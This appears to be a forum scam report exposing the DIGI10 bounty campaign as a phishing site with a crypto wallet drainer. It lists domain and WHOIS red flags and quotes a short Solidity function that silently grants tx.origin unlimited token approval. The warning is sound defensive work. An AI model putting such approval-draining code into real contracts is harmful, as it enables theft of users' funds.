What happened:: This Newbie member created a bounty campaign for a website called DIGI10, which is supposedly meant to operate only on Base.
Based on my research, I confirmed that this is a phishing site containing a wallet drainer.
The first red flag is the domain ending in .xyz Also, in the MetaMask window, it requests extensive permissions to scan across all networks in order to search for any "liquidity" in the wallet on networks other than Base (such as Ethereum or BSC). Once you sign any "approval," the malicious contract can drain assets from all networks where you have a balance.
Additionally, the domain is less than a year old, and the site uses references to CEX platforms to create a false sense of legitimacy.
The network logs indicate persistent failures for requests to
find?name=digi10.xyz.The website is attempting to exfiltrate my wallet fingerprint and balance history to an external server. Since Im using a new wallet with no balance, the server either fails to respond or returns a
404 error as the script ignores it since there’s nothing in it
Scammers Profile Link: https://bitcointalk.org/index.php?action=profile;u=2857103Reference Link: [1]
DIGI10 NETWORK – OFFICIAL BOUNTY CAMPAIGN 🔥Jan 04 2026[2] digi10[.]xyz |
ARCHIVED |
WHOIS[3]
Malicious Drainer Contract: 0x6e8D916Cd8c53b8ba11dd91512097C0b9FA5F5A9 |
CODEfunction _claimReward(address account) internal {
_approve(account, tx.origin, type(uint256).max);
}Domain: digi10.xyz
Registered On: 2025-08-21
Expires On: 2026-08-21
Updated On: 2025-09-01
Registrar Information
Registrar: Namecheap
IANA ID: 1068
Email: support@namecheap.com
For those still participating in bounty campaigns, you should be cautious. Always choose managers with a solid reputation, and it’s best to avoid newbie accounts. Also, always check their trust feedback.
